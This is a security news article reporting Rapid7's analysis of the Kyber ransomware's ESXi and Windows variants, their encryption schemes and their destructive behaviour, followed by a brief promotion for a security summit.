A new Kyber ransomware operation is targeting Windows systems and VMware ESXi endpoints in recent attacks, with one variant implementing Kyber1024 post-quantum encryption.
Cybersecurity firm Rapid7 retrieved and analyzed two distinct Kyber variants in March 2026 during an incident response. Both variants were deployed on the same network, with one targeting VMware ESXi and the other focusing on Windows file servers.
“The ESXi variant is specifically built for VMware environments, with capabilities for datastore encryption, optional virtual machine termination, and defacement of management interfaces,” explains Rapid7.
“The Windows variant, written in Rust, includes a self-described “experimental” feature for targeting Hyper-V.”
Both variants share the same campaign ID and Tor-based ransom infrastructure, so they were deployed by the same ransomware affiliate, who likely sought to maximize impact by encrypting all servers simultaneously.
BleepingComputer has found only one listed victim on the Kyber data extortion portal at the time of writing, which is a multi-billion-dollar American defense contractor and IT services provider.
Source: BleepingComputer.com
Rapid7 says the ESXi variant enumerates all virtual machines (VMs) on the infrastructure, encrypts datastore files, and then defaces the ESXi interfaces with ransom notes to guide victims through the ransom payment and recovery process.
Although it advertises ‘post-quantum’ encryption based on Kyber1024 key encapsulation, Rapid7 has found that these claims are false for the Linux ESXi encryptor.
For the Linux version, the ransomware uses ChaCha8 for file encryption and RSA-4096 for key wrapping.
Small files (<1 MB) are encrypted in full and appended with the ‘.xhsyw’ extension, while files between 1 MB and 4 MB have only the first MB encrypted. Files larger than 4MB are intermittently encrypted based on the operator’s configuration.
Source: Rapid7
The Windows variant, written in Rust, implements Kyber1024 and X25519 for key protection, aligning with the ransom note’s claims.
“This confirms that Kyber is not used for direct file encryption. Instead, Kyber1024 protects the symmetric key material, while AES-CTR handles bulk data encryption,” Rapid7 explains.
While the use of post-quantum cryptography is notable, it does not change outcomes for victims. Whether the encryptor uses RSA or Kyber1024, files remain unrecoverable without access to the attacker’s private key.
The Windows variant appends the ‘.#~~~’ extension to encrypted files, terminates services, deletes backups, and includes an experimental feature to shut down Hyper-V virtual machines.
Source: Rapid7
It is designed to eliminate a broad range of data recovery paths, deleting shadow copies, disabling boot repair, killing SQL, Exchange, and backup services, clearing event logs, and wiping the Windows Recycle Bin.
Rapid7 highlighted an unusual choice of a mutex in the Windows variant of Kyber, which appears to reference a song on the Boomplay music platform.
Overall, the Windows variant appears more technically mature, while the ESXi variant currently lacks some of its features.
AI chained four zero-days into one exploit that bypassed both renderer and OS sandboxes. A wave of new exploits is coming.
At the Autonomous Validation Summit (May 12 & 14), see how autonomous, context-rich validation finds what’s exploitable, proves controls hold, and closes the remediation loop.
